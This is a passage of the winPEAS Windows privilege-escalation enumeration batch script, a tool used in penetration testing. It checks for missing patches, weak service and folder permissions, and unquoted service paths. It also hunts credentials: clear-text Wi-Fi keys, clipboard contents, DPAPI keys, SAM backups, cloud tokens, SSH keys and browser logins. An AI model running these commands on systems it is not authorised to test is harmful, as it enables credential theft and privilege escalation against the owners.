(Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) 104 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL 105 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) 106 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL 107 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) 108 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL 109 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) 110 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL 111 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) 112 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL 113 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) 114 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL 115 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) 116 | ECHO. 117 | CALL :T_Progress 2 118 | 119 | :DateAndTime 120 | CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME" 121 | ECHO. [i] You may need to adjust your local date/time to exploit some vulnerability 122 | date /T 123 | time /T 124 | ECHO. 125 | CALL :T_Progress 2 126 | 127 | :AuditSettings 128 | CALL :ColorLine " %E%33m[+]%E%97m Audit Settings" 129 | ECHO. [i] Check what is being logged 130 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul 131 | ECHO. 
132 | CALL :T_Progress 1 133 | 134 | :WEFSettings 135 | CALL :ColorLine " %E%33m[+]%E%97m WEF Settings" 136 | ECHO. [i] Check where are being sent the logs 137 | REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul 138 | ECHO. 139 | CALL :T_Progress 1 140 | 141 | :LAPSInstallCheck 142 | CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?" 143 | ECHO. [i] Check what is being logged 144 | REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul 145 | ECHO. 146 | CALL :T_Progress 1 147 | 148 | :LSAProtectionCheck 149 | CALL :ColorLine " %E%33m[+]%E%97m LSA protection?" 150 | ECHO. [i] Active if "1" 151 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul 152 | CALL :T_Progress 1 153 | 154 | :LSACredentialGuard 155 | CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?" 156 | ECHO. [i] Active if "1" or "2" 157 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul 158 | ECHO. 159 | CALL :T_Progress 1 160 | 161 | :LogonCredentialsPlainInMemory 162 | CALL :ColorLine " %E%33m[+]%E%97m WDigest?" 163 | ECHO. [i] Plain-text creds in memory if "1" 164 | reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul 165 | ECHO. 166 | CALL :T_Progress 1 167 | 168 | :CachedCreds 169 | CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds" 170 | ECHO. [i] You need System-rights to extract them 171 | reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul 172 | CALL :T_Progress 1 173 | 174 | :UACSettings 175 | CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" 176 | ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on 177 | ECHO. [?] 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access 178 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul 179 | ECHO. 180 | CALL :T_Progress 1 181 | 182 | :AVSettings 183 | CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" 184 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 185 | ECHO.Checking for defender whitelisted PATHS 186 | reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul 187 | CALL :T_Progress 1 188 | 189 | :PSSettings 190 | CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings" 191 | ECHO.PowerShell v2 Version: 192 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul 193 | ECHO.PowerShell v5 Version: 194 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul 195 | ECHO.Transcriptions Settings: 196 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul 197 | ECHO.Module logging settings: 198 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul 199 | ECHO.Scriptblog logging settings: 200 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul 201 | ECHO. 202 | ECHO.PS default transcript history 203 | dir %SystemDrive%\transcripts\ 2>nul 204 | ECHO. 205 | ECHO.Checking PS history file 206 | dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul 207 | ECHO. 208 | CALL :T_Progress 3 209 | 210 | :MountedDisks 211 | CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" 212 | ECHO. [i] Maybe you find something interesting 213 | (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) 214 | ECHO. 
CALL :T_Progress 1

:Environment
CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT"
ECHO. [i] Interesting information?
ECHO.
set
ECHO.
CALL :T_Progress 1

:InstalledSoftware
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
ECHO. [i] Some weird software? Check for vulnerabilities in unknown software installed
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
ECHO.
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\"
IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading)
ECHO.
CALL :T_Progress 2

:RemodeDeskCredMgr
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
ECHO.
CALL :T_Progress 1

:WSUS
CALL :ColorLine " %E%33m[+]%E%97m WSUS"
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
ECHO.
CALL :T_Progress 1

:RunningProcesses
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
ECHO. [i] Something unexpected is running? Check for vulnerabilities
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
tasklist /SVC
ECHO.
CALL :T_Progress 2
ECHO. [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
    for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do (
        icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
    )
)
ECHO.
ECHO. [i] Checking directory permissions of running processes (DLL injection)
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do (
    icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO.
)
ECHO.
CALL :T_Progress 3

:RunAtStartup
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
CALL :T_Progress 2
icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
CALL :T_Progress 2
icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^
CALL :T_Progress 2
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa")
ECHO.
CALL :T_Progress 2

:AlwaysInstallElevated
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
ECHO.
CALL :T_Progress 2

:NetworkShares
CALL :ColorLine "%E%32m[*]%E%97m NETWORK"
CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES"
net share
ECHO.
CALL :T_Progress 1

:NetworkInterfaces
CALL :ColorLine " %E%33m[+]%E%97m INTERFACES"
ipconfig /all
ECHO.
CALL :T_Progress 1

:NetworkUsedPorts
CALL :ColorLine " %E%33m[+]%E%97m USED PORTS"
ECHO. [i] Check for services restricted from the outside
netstat -ano | findstr /i listen
ECHO.
CALL :T_Progress 1

:NetworkFirewall
CALL :ColorLine " %E%33m[+]%E%97m FIREWALL"
netsh firewall show state
netsh firewall show config
ECHO.
CALL :T_Progress 2

:ARP
CALL :ColorLine " %E%33m[+]%E%97m ARP"
arp -A
ECHO.
CALL :T_Progress 1

:NetworkRoutes
CALL :ColorLine " %E%33m[+]%E%97m ROUTES"
route print
ECHO.
CALL :T_Progress 1

:WindowsHostsFile
CALL :ColorLine " %E%33m[+]%E%97m Hosts file"
type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#"
CALL :T_Progress 1

:DNSCache
CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE"
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
ECHO.
CALL :T_Progress 1

:WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI"
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1

:BasicUserInfo
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO"
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be used to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
ECHO.
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
net user %username%
net user %USERNAME% /domain 2>nul
whoami /all
ECHO.
CALL :T_Progress 2

:BasicUserInfoUsers
CALL :ColorLine " %E%33m[+]%E%97m USERS"
net user
ECHO.
CALL :T_Progress 1

:BasicUserInfoGroups
CALL :ColorLine " %E%33m[+]%E%97m GROUPS"
net localgroup
ECHO.
CALL :T_Progress 1

:BasicUserInfoAdminGroups
CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS"
REM seems to be localised
net localgroup Administrators 2>nul
net localgroup Administradores 2>nul
ECHO.
CALL :T_Progress 1

:BasicUserInfoLoggedUser
CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS"
quser
ECHO.
CALL :T_Progress 1

:KerberosTickets
CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets"
klist
ECHO.
CALL :T_Progress 1

:CurrentClipboard
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
ECHO. [i] Any password inside the clipboard?
powershell -command "Get-Clipboard" 2>nul
ECHO.
CALL :T_Progress 1

:ServiceVulnerabilities
CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES"
:::sysinternals external tool
::ECHO.
::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER"
::ECHO. [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service
::ECHO. [i] If accesschk.exe is not in PATH, nothing will be found here
::ECHO. [i] AUTHENTICATED USERS
::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul
::ECHO. [i] EVERYONE
::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul
::ECHO. [i] BUILTIN\Users
::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
::ECHO. [i] TODOS
::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul
::ECHO. [i] %USERNAME%
::accesschk.exe -uwcqv %username% * /accepteula 2>nul
::ECHO.
::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *"
::ECHO. [i] Check for weird service permissions for unexpected groups"
::accesschk.exe -uwcqv * /accepteula 2>nul
CALL :T_Progress 1
ECHO.

:ServiceBinaryPermissions
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
    for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
)
ECHO.
CALL :T_Progress 1

:CheckRegistryModificationAbilities
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
ECHO.
CALL :T_Progress 1

:UnquotedServicePaths
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
ECHO. [i] The permissions are also checked and filtered using icacls
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
    for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
        ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
    )
)
CALL :T_Progress 2
::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """
ECHO.
::CALL :T_Progress 1

:PATHenvHijacking
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
ECHO.
CALL :T_Progress 1

:WindowsCredentials
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
ECHO.
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
cmdkey /list
ECHO.
CALL :T_Progress 2

:DPAPIMasterKeys
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
CALL :T_Progress 2
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
ECHO.
ECHO.Looking inside %appdata%\Microsoft\Credentials\
ECHO.
dir /b/a %appdata%\Microsoft\Credentials\ 2>nul
CALL :T_Progress 2
ECHO.
ECHO.Looking inside %localappdata%\Microsoft\Credentials\
ECHO.
dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul
CALL :T_Progress 2
ECHO.

:UnattendedFiles
CALL :ColorLine " %E%33m[+]%E%97m Unattended files"
IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists.
IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists.
IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists.
IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists.
IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists.
IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists.
IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists.
IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists.
IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists.
IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists.
IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists.
ECHO.
CALL :T_Progress 2

:SAMSYSBackups
CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups"
IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists.
IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists.
IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists.
IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists.
IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists.
IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists.
ECHO.
CALL :T_Progress 3

:McAffeeSitelist
CALL :ColorLine " %E%33m[+]%E%97m McAfee SiteList.xml"
cd %ProgramFiles% 2>nul
dir /s SiteList.xml 2>nul
cd %ProgramFiles(x86)% 2>nul
dir /s SiteList.xml 2>nul
cd "%windir%\..\Documents and Settings" 2>nul
dir /s SiteList.xml 2>nul
cd %windir%\..\Users 2>nul
dir /s SiteList.xml 2>nul
ECHO.
CALL :T_Progress 2

:GPPPassword
CALL :ColorLine " %E%33m[+]%E%97m GPP Password"
cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul
dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul
cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul
dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul
ECHO.
CALL :T_Progress 2

:CloudCreds
CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials"
cd "%SystemDrive%\Users"
dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul
cd "%windir%\..\Documents and Settings"
dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul
ECHO.
CALL :T_Progress 2

:AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO.
CALL :T_Progress 2

:RegFilesCredentials
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
ECHO. [i] Searching specific files that may contain credentials.
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
CALL :T_Progress 2
ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul
CALL :T_Progress 2
ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
CALL :T_Progress 2
ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul
CALL :T_Progress 2
ECHO.Looking inside HKCU\Software\TightVNC\Server
reg query HKCU\Software\TightVNC\Server 2>nul
CALL :T_Progress 2
ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul
CALL :T_Progress 2
ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys
CALL :T_Progress 2
reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul
cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul
cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"
cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..)
ECHO.
CALL :T_Progress 2

:ExtendedDriveScan
if "%long%" == "true" (
    CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd"
    reg query HKLM /f passw /t REG_SZ /s
    reg query HKCU /f passw /t REG_SZ /s
    reg query HKLM /f pwd /t REG_SZ /s
    reg query HKCU /f pwd /t REG_SZ /s
    ECHO.
    ECHO. [i] Iterating through the drives
    ECHO.
    for /f %%x in ('wmic logicaldisk get name^| more') do (
        set tdrive=%%x
        if "!tdrive:~1,2!" == ":" (
            %%x
            CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAIN THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config"
            findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul
            ECHO.
            CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\"
            dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\"
            ECHO.
        )
    )
    CALL :T_Progress 2
) ELSE (
    CALL :T_Progress 2
)
TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle
ECHO.---
ECHO.Scan complete.
PAUSE >NUL
EXIT /B

:::-Subroutines

:SetOnce
REM :: ANSI escape character is set once below - for ColorLine Subroutine
SET "E=0x1B["
SET "PercentageTrack=0"
EXIT /B

